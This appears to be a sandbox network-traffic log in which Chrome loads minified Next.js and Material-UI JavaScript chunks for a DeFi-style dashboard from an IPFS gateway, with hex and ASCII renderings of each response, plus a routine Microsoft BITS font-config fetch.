                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1304INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 39 35 32 32 5d 2c 7b 36 32 37 35 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 6e 28 36 34 38 33 36 29 3b 74 2e 5a 3d 76 6f 69 64 20 30 3b 76 61 72 20 6f 3d 72 28 6e 28 36 34 39 33 38 29 29 2c 61 3d 6e 28 38 35 38 39 33 29 2c 69 3d 28 30 2c 6f 2e 64 65 66 61 75 6c 74 29 28 28 30 2c 61 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 6d 31 39 2e 37 37 20 37 2e 32 33 2e 30 31 2d 2e 30 31 2d 33 2e 37 32 2d 33 2e 37 32 4c 31 35 20 34 2e 35 36 6c 32 2e 31 31 20 32 2e 31 31 63 2d 2e 39 34 2e 33 36 2d 31 2e 36 31 20 31 2e 32 36
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9522],{62753:function(e,t,n){var r=n(64836);t.Z=void 0;var o=r(n(64938)),a=n(85893),i=(0,o.default)((0,a.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 6d 22 2c 6f 76 65 72 66 6c 6f 77 3a 22 68 69 64 64 65 6e 22 2c 64 69 73 70 6c 61 79 3a 22 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 22 2c 74 65 78 74 41 6c 69 67 6e 3a 22 63 65 6e 74 65 72 22 2c 66 6c 65 78 53 68 72 69 6e 6b 3a 30 2c 66 6f 6e 74 53 69 7a 65 3a 7b 69 6e 68 65 72 69 74 3a 22 69 6e 68 65 72 69 74 22 2c 73 6d 61 6c 6c 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 32 30 29 2c 6d 65 64 69 75 6d 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 32 34 29 2c 6c 61 72 67 65 3a 65 2e 74 79 70 6f 67 72 61 70 68 79 2e 70 78 54 6f 52 65 6d 28 33 36 29 7d 5b 74 2e 66 6f 6e 74 53 69 7a 65 5d 2c 63 6f 6c 6f 72 3a 7b 70 72 69 6d 61 72 79 3a 28 65 2e 76 61 72 73 7c 7c 65 29 2e 70 61 6c 65 74 74 65 2e 70 72 69 6d 61 72 79 2e 6d
                                                                                                                                                                                                                                                  Data Ascii: m",overflow:"hidden",display:"inline-block",textAlign:"center",flexShrink:0,fontSize:{inherit:"inherit",small:e.typography.pxToRem(20),medium:e.typography.pxToRem(24),large:e.typography.pxToRem(36)}[t.fontSize],color:{primary:(e.vars||e).palette.primary.m
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 41 72 72 61 79 28 65 29 2e 66 69 6c 74 65 72 28 42 6f 6f 6c 65 61 6e 29 3b 72 65 74 75 72 6e 20 6e 2e 72 65 64 75 63 65 28 28 28 65 2c 72 2c 6f 29 3d 3e 28 65 2e 70 75 73 68 28 72 29 2c 6f 3c 6e 2e 6c 65 6e 67 74 68 2d 31 26 26 65 2e 70 75 73 68 28 61 2e 63 6c 6f 6e 65 45 6c 65 6d 65 6e 74 28 74 2c 7b 6b 65 79 3a 60 73 65 70 61 72 61 74 6f 72 2d 24 7b 6f 7d 60 7d 29 29 2c 65 29 29 2c 5b 5d 29 7d 63 6f 6e 73 74 20 78 3d 28 30 2c 75 2e 5a 50 29 28 22 64 69 76 22 2c 7b 6e 61 6d 65 3a 22 4d 75 69 53 74 61 63 6b 22 2c 73 6c 6f 74 3a 22 52 6f 6f 74 22 2c 6f 76 65 72 72 69 64 65 73 52 65 73 6f 6c 76 65 72 3a 28 65 2c 74 29 3d 3e 5b 74 2e 72 6f 6f 74 5d 7d 29 28 28 28 7b 6f 77 6e 65 72 53 74 61 74 65 3a 65 2c 74 68 65 6d 65 3a 74 7d 29 3d 3e 7b 6c 65 74 20 6e 3d
                                                                                                                                                                                                                                                  Data Ascii: Array(e).filter(Boolean);return n.reduce(((e,r,o)=>(e.push(r),o<n.length-1&&e.push(a.cloneElement(t,{key:`separator-${o}`})),e)),[])}const x=(0,u.ZP)("div",{name:"MuiStack",slot:"Root",overridesResolver:(e,t)=>[t.root]})((({ownerState:e,theme:t})=>{let n=
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 3d 76 7d 2c 39 36 38 37 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 6e 2e 64 28 74 2c 7b 6f 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 68 7d 7d 29 3b 76 61 72 20 72 3d 6e 28 35 39 34 39 39 29 2c 6f 3d 6e 28 34 37 33 30 29 2c 61 3d 6e 28 34 39 35 30 31 29 2c 69 3d 6e 28 31 32 37 39 29 2c 73 3d 6e 28 36 32 30 39 37 29 2c 63 3d 6e 28 33 30 31 32 30 29 2c 6c 3d 6e 28 32 39 36 33 30 29 2c 75 3d 6e 28 37 35 30 38 34 29 2c 64 3d 6e 28 37 30 37 39 34 29 2c 70 3d 6e 28 34 31 30 32 34 29 2c 6d 3d 6e 28 38 35 38 39 33 29 2c 66 3d 5b 22 76 61 6c 75 65 22 2c 22 6f 6e 49 6e 66 6f 43 6c 69 63 6b 22 2c 22 48 41 4c 49 6e 74 65 67 72 61 74 69 6f 6e 43 6f 6d 70 6f 6e 65 6e 74 22 5d 3b 66 75 6e 63 74 69 6f 6e 20 78 28 65 2c 74 29 7b 76 61 72 20 6e 3d
                                                                                                                                                                                                                                                  Data Ascii: =v},96875:function(e,t,n){n.d(t,{o:function(){return h}});var r=n(59499),o=n(4730),a=n(49501),i=n(1279),s=n(62097),c=n(30120),l=n(29630),u=n(75084),d=n(70794),p=n(41024),m=n(85893),f=["value","onInfoClick","HALIntegrationComponent"];function x(e,t){var n=
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 7d 2c 78 29 29 2c 6e 26 26 28 30 2c 6d 2e 6a 73 78 29 28 75 2e 5a 2c 7b 6f 6e 43 6c 69 63 6b 3a 6e 2c 76 61 72 69 61 6e 74 3a 22 73 75 72 66 61 63 65 22 2c 73 69 7a 65 3a 22 73 6d 61 6c 6c 22 2c 73 78 3a 7b 6d 69 6e 57 69 64 74 68 3a 22 75 6e 73 65 74 22 2c 6d 6c 3a 7b 78 73 3a 30 2c 78 73 6d 3a 32 7d 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 6d 2e 6a 73 78 29 28 61 2e 63 43 2c 7b 69 64 3a 22 52 69 73 6b 20 64 65 74 61 69 6c 73 22 7d 29 7d 29 2c 72 26 26 28 30 2c 6d 2e 6a 73 78 29 28 63 2e 5a 2c 7b 6d 6c 3a 7b 78 73 3a 30 2c 78 73 6d 3a 32 7d 2c 6d 74 3a 7b 78 73 3a 31 2c 78 73 6d 3a 30 7d 2c 63 68 69 6c 64 72 65 6e 3a 72 7d 29 5d 7d 29 7d 7d 2c 38 31 39 30 32 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3b 6e 2e 64 28 74 2c 7b 52 3a
                                                                                                                                                                                                                                                  Data Ascii: },x)),n&&(0,m.jsx)(u.Z,{onClick:n,variant:"surface",size:"small",sx:{minWidth:"unset",ml:{xs:0,xsm:2}},children:(0,m.jsx)(a.cC,{id:"Risk details"})}),r&&(0,m.jsx)(c.Z,{ml:{xs:0,xsm:2},mt:{xs:1,xsm:0},children:r})]})}},81902:function(e,t,n){var r;n.d(t,{R:
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 38 39 38 38 20 31 37 2e 33 39 38 20 32 2e 32 38 31 31 37 20 31 37 2e 31 38 37 32 20 31 2e 39 30 36 31 20 31 36 2e 38 31 32 32 43 31 2e 35 33 31 30 33 20 31 36 2e 34 33 37 31 20 31 2e 33 32 30 33 31 20 31 35 2e 39 32 38 34 20 31 2e 33 32 30 33 31 20 31 35 2e 33 39 37 39 56 36 2e 33 39 37 39 35 43 31 2e 33 32 30 33 31 20 35 2e 38 36 37 35 32 20 31 2e 35 33 31 30 33 20 35 2e 33 35 38 38 31 20 31 2e 39 30 36 31 20 34 2e 39 38 33 37 34 43 32 2e 32 38 31 31 37 20 34 2e 36 30 38 36 36 20 32 2e 37 38 39 38 38 20 34 2e 33 39 37 39 35 20 33 2e 33 32 30 33 31 20 34 2e 33 39 37 39 35 48 31 37 2e 33 32 30 33 43 31 37 2e 38 35 30 37 20 34 2e 33 39 37 39 35 20 31 38 2e 33 35 39 35 20 34 2e 36 30 38 36 36 20 31 38 2e 37 33 34 35 20 34 2e 39 38 33 37 34 43 31 39 2e 31 30
                                                                                                                                                                                                                                                  Data Ascii: 8988 17.398 2.28117 17.1872 1.9061 16.8122C1.53103 16.4371 1.32031 15.9284 1.32031 15.3979V6.39795C1.32031 5.86752 1.53103 5.35881 1.9061 4.98374C2.28117 4.60866 2.78988 4.39795 3.32031 4.39795H17.3203C17.8507 4.39795 18.3595 4.60866 18.7345 4.98374C19.10
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 22 2c 74 72 61 6e 73 66 6f 72 6d 3a 22 74 72 61 6e 73 6c 61 74 65 28 30 2e 33 32 30 33 31 32 29 22 7d 29 7d 29 7d 29 5d 7d 29 29 7d 7d 2c 31 32 33 34 39 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 6e 2e 64 28 74 2c 7b 4d 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 79 7d 7d 29 3b 76 61 72 20 72 3d 6e 28 31 32 37 39 29 2c 6f 3d 6e 28 38 30 30 35 39 29 2c 61 3d 6e 28 33 30 31 32 30 29 2c 69 3d 6e 28 32 39 36 33 30 29 2c 73 3d 6e 28 38 31 36 34 35 29 2c 63 3d 6e 28 36 37 32 39 34 29 2c 6c 3d 6e 28 37 38 33 37 31 29 2c 75 3d 6e 28 35 37 36 30 39 29 2c 64 3d 6e 28 39 37 35 36 33 29 2c 70 3d 6e 28 34 31 30 32 34 29 2c 6d 3d 6e 28 37 32 36 36 37 29 2c 66 3d 6e 28 34 39 35 30 31 29 2c 78 3d 6e 28 39 32 33 39 31 29 2c 76 3d 6e 28 38 35 38 39 33
                                                                                                                                                                                                                                                  Data Ascii: ",transform:"translate(0.320312)"})})})]}))}},12349:function(e,t,n){n.d(t,{M:function(){return y}});var r=n(1279),o=n(80059),a=n(30120),i=n(29630),s=n(81645),c=n(67294),l=n(78371),u=n(57609),d=n(97563),p=n(41024),m=n(72667),f=n(49501),x=n(92391),v=n(85893
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 2e 72 65 77 61 72 64 54 6f 6b 65 6e 53 79 6d 62 6f 6c 7d 29 5d 7d 29 2c 77 69 64 74 68 3a 22 31 30 30 25 22 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 76 2e 6a 73 78 29 28 73 2c 7b 69 6e 63 65 6e 74 69 76 65 41 50 52 3a 65 2e 69 6e 63 65 6e 74 69 76 65 41 50 52 7d 29 7d 2c 65 2e 72 65 77 61 72 64 54 6f 6b 65 6e 41 64 64 72 65 73 73 29 7d 29 29 2c 74 2e 6c 65 6e 67 74 68 3e 31 26 26 28 30 2c 76 2e 6a 73 78 29 28 61 2e 5a 2c 7b 73 78 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 7b 70 74 3a 31 2c 6d 74 3a 31 2c 62 6f 72 64 65 72 3a 22 31 70 78 20 73 6f 6c 69 64 20 22 2e 63 6f 6e 63 61 74 28 65 2e 70 61 6c 65 74 74 65 2e 64 69 76 69 64 65 72 29 7d 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 76 2e 6a 73 78 29 28 78 2e 58 2c 7b 63 61 70 74 69 6f 6e 3a 28
                                                                                                                                                                                                                                                  Data Ascii: .rewardTokenSymbol})]}),width:"100%",children:(0,v.jsx)(s,{incentiveAPR:e.incentiveAPR})},e.rewardTokenAddress)})),t.length>1&&(0,v.jsx)(a.Z,{sx:function(e){return{pt:1,mt:1,border:"1px solid ".concat(e.palette.divider)}},children:(0,v.jsx)(x.X,{caption:(
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 69 6f 6e 3a 22 6f 70 61 63 69 74 79 20 30 2e 32 73 20 65 61 73 65 22 2c 62 67 63 6f 6c 6f 72 3a 79 3f 22 61 63 74 69 6f 6e 2e 68 6f 76 65 72 22 3a 22 74 72 61 6e 73 70 61 72 65 6e 74 22 2c 22 26 3a 68 6f 76 65 72 22 3a 7b 62 67 63 6f 6c 6f 72 3a 22 61 63 74 69 6f 6e 2e 68 6f 76 65 72 22 2c 62 6f 72 64 65 72 43 6f 6c 6f 72 3a 22 61 63 74 69 6f 6e 2e 64 69 73 61 62 6c 65 64 22 7d 7d 7d 2c 6f 6e 43 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 67 28 75 2e 68 31 2e 56 49 45 57 5f 4c 4d 5f 44 45 54 41 49 4c 53 5f 44 41 53 48 42 4f 41 52 44 2c 7b 7d 29 2c 6a 28 21 79 29 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 76 2e 6a 73 78 29 28 61 2e 5a 2c 7b 73 78 3a 7b 6d 72 3a 32 7d 2c 63 68 69 6c 64 72 65 6e 3a 22 49 6e 66 69 6e 69 74 79 22 21 3d 3d 53 26 26 53 3c
                                                                                                                                                                                                                                                  Data Ascii: ion:"opacity 0.2s ease",bgcolor:y?"action.hover":"transparent","&:hover":{bgcolor:"action.hover",borderColor:"action.disabled"}}},onClick:function(){g(u.h1.VIEW_LM_DETAILS_DASHBOARD,{}),j(!y)},children:[(0,v.jsx)(a.Z,{sx:{mr:2},children:"Infinity"!==S&&S<


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  47192.168.2.549765209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC742OUTGET /_next/static/chunks/webpack-7cee0530881530e6.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:43 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 5533
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreiatibnwwgd7zbf7d2liffc535qh7cyevg6sdsnjb3os75klpglcpm"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/webpack-7cee0530881530e6.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreiatibnwwgd7zbf7d2liffc535qh7cyevg6sdsnjb3os75klpglcpm
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-dc13-10
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 98746
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 31 62 66 63 64 62 34 33 32 63 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e41bfcdb432c-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1304INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 76 61 72 20 65 3d 7b 7d 2c 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 63 29 7b 76 61 72 20 72 3d 74 5b 63 5d 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 72 29 72 65 74 75 72 6e 20 72 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 61 3d 74 5b 63 5d 3d 7b 69 64 3a 63 2c 6c 6f 61 64 65 64 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 2c 66 3d 21 30 3b 74 72 79 7b 65 5b 63 5d 2e 63 61 6c 6c 28 61 2e 65 78 70 6f 72 74 73 2c 61 2c 61 2e 65 78 70 6f 72 74 73 2c 6e 29 2c 66 3d 21 31 7d 66 69 6e 61 6c 6c 79 7b 66 26 26 64 65 6c 65 74 65 20 74 5b 63 5d 7d 72 65 74 75 72 6e 20 61 2e 6c 6f 61 64 65 64 3d 21 30 2c 61 2e 65 78 70 6f 72 74 73 7d 6e 2e 6d 3d 65 2c 6e 2e 61 6d 64 4f 3d 7b 7d 2c 66 75 6e 63
                                                                                                                                                                                                                                                  Data Ascii: !function(){"use strict";var e={},t={};function n(c){var r=t[c];if(void 0!==r)return r.exports;var a=t[c]={id:c,loaded:!1,exports:{}},f=!0;try{e[c].call(a.exports,a,a.exports,n),f=!1}finally{f&&delete t[c]}return a.loaded=!0,a.exports}n.m=e,n.amdO={},func
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 7b 66 6f 72 28 76 61 72 20 63 20 69 6e 20 74 29 6e 2e 6f 28 74 2c 63 29 26 26 21 6e 2e 6f 28 65 2c 63 29 26 26 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 65 2c 63 2c 7b 65 6e 75 6d 65 72 61 62 6c 65 3a 21 30 2c 67 65 74 3a 74 5b 63 5d 7d 29 7d 2c 6e 2e 66 3d 7b 7d 2c 6e 2e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 61 6c 6c 28 4f 62 6a 65 63 74 2e 6b 65 79 73 28 6e 2e 66 29 2e 72 65 64 75 63 65 28 28 66 75 6e 63 74 69 6f 6e 28 74 2c 63 29 7b 72 65 74 75 72 6e 20 6e 2e 66 5b 63 5d 28 65 2c 74 29 2c 74 7d 29 2c 5b 5d 29 29 7d 2c 6e 2e 75 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 34 32 35 34 3d 3d 3d 65 3f 22 73 74 61 74 69 63 2f 63 68 75 6e 6b 73 2f 34 32 35 34 2d 61 63 30
                                                                                                                                                                                                                                                  Data Ascii: {for(var c in t)n.o(t,c)&&!n.o(e,c)&&Object.defineProperty(e,c,{enumerable:!0,get:t[c]})},n.f={},n.e=function(e){return Promise.all(Object.keys(n.f).reduce((function(t,c){return n.f[c](e,t),t}),[]))},n.u=function(e){return 4254===e?"static/chunks/4254-ac0
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 62 61 30 32 22 2c 36 36 32 33 3a 22 65 31 62 63 66 30 66 38 33 37 63 38 34 35 65 33 22 2c 36 37 35 35 3a 22 65 38 64 65 31 36 32 36 31 36 32 34 36 31 39 30 22 2c 36 37 38 32 3a 22 35 64 66 65 66 37 38 39 33 64 64 35 62 65 61 34 22 2c 37 32 38 33 3a 22 66 63 35 65 65 31 62 38 36 32 38 66 33 33 62 66 22 2c 37 33 39 39 3a 22 35 62 36 66 62 66 65 65 33 31 65 35 37 35 34 33 22 2c 37 35 36 31 3a 22 33 66 63 65 34 66 31 34 33 36 66 32 31 33 30 37 22 2c 37 36 30 33 3a 22 35 38 63 62 32 37 30 31 30 65 30 61 31 32 64 38 22 2c 37 37 35 36 3a 22 62 61 35 64 35 63 31 32 63 36 31 63 33 38 31 64 22 2c 37 38 32 38 3a 22 62 63 34 32 62 65 32 36 61 39 65 39 34 62 62 37 22 2c 37 38 38 38 3a 22 34 36 37 30 62 65 62 38 37 30 32 32 31 66 62 35 22 2c 38 31 30 30 3a 22 33 38 39
                                                                                                                                                                                                                                                  Data Ascii: ba02",6623:"e1bcf0f837c845e3",6755:"e8de162616246190",6782:"5dfef7893dd5bea4",7283:"fc5ee1b8628f33bf",7399:"5b6fbfee31e57543",7561:"3fce4f1436f21307",7603:"58cb27010e0a12d8",7756:"ba5d5c12c61c381d",7828:"bc42be26a9e94bb7",7888:"4670beb870221fb5",8100:"389
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC1369INData Raw: 2e 73 72 63 3d 63 29 2c 65 5b 63 5d 3d 5b 72 5d 3b 76 61 72 20 73 3d 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 64 2e 6f 6e 65 72 72 6f 72 3d 64 2e 6f 6e 6c 6f 61 64 3d 6e 75 6c 6c 2c 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 6c 29 3b 76 61 72 20 72 3d 65 5b 63 5d 3b 69 66 28 64 65 6c 65 74 65 20 65 5b 63 5d 2c 64 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 64 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 64 29 2c 72 26 26 72 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 28 6e 29 7d 29 29 2c 74 29 72 65 74 75 72 6e 20 74 28 6e 29 7d 2c 6c 3d 73 65 74 54 69 6d 65 6f 75 74 28 73 2e 62 69 6e 64 28 6e 75 6c 6c 2c 76 6f 69 64 20 30 2c 7b 74 79 70 65 3a 22 74 69 6d 65 6f 75 74 22 2c 74 61 72 67 65 74
                                                                                                                                                                                                                                                  Data Ascii: .src=c),e[c]=[r];var s=function(t,n){d.onerror=d.onload=null,clearTimeout(l);var r=e[c];if(delete e[c],d.parentNode&&d.parentNode.removeChild(d),r&&r.forEach((function(e){return e(n)})),t)return t(n)},l=setTimeout(s.bind(null,void 0,{type:"timeout",target
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC122INData Raw: 28 75 29 7d 2c 63 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 3b 63 2e 66 6f 72 45 61 63 68 28 74 2e 62 69 6e 64 28 6e 75 6c 6c 2c 30 29 29 2c 63 2e 70 75 73 68 3d 74 2e 62 69 6e 64 28 6e 75 6c 6c 2c 63 2e 70 75 73 68 2e 62 69 6e 64 28 63 29 29 7d 28 29 7d 28 29 3b
                                                                                                                                                                                                                                                  Data Ascii: (u)},c=self.webpackChunk_N_E=self.webpackChunk_N_E||[];c.forEach(t.bind(null,0)),c.push=t.bind(null,c.push.bind(c))}()}();


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  48192.168.2.549756184.28.90.27443
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC239OUTGET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                  If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                  Range: bytes=0-2147483646
                                                                                                                                                                                                                                                  User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                  Host: fs.microsoft.com
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                  Server: ECAcc (lpl/EF06)
                                                                                                                                                                                                                                                  X-CID: 11
                                                                                                                                                                                                                                                  X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                  X-Ms-Region: prod-weu-z1
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=218029
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:43 GMT
                                                                                                                                                                                                                                                  Content-Length: 55
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  X-CID: 2
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                  Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  49192.168.2.549766209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:43 UTC744OUTGET /_next/static/chunks/framework-79bce4a3a540b080.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
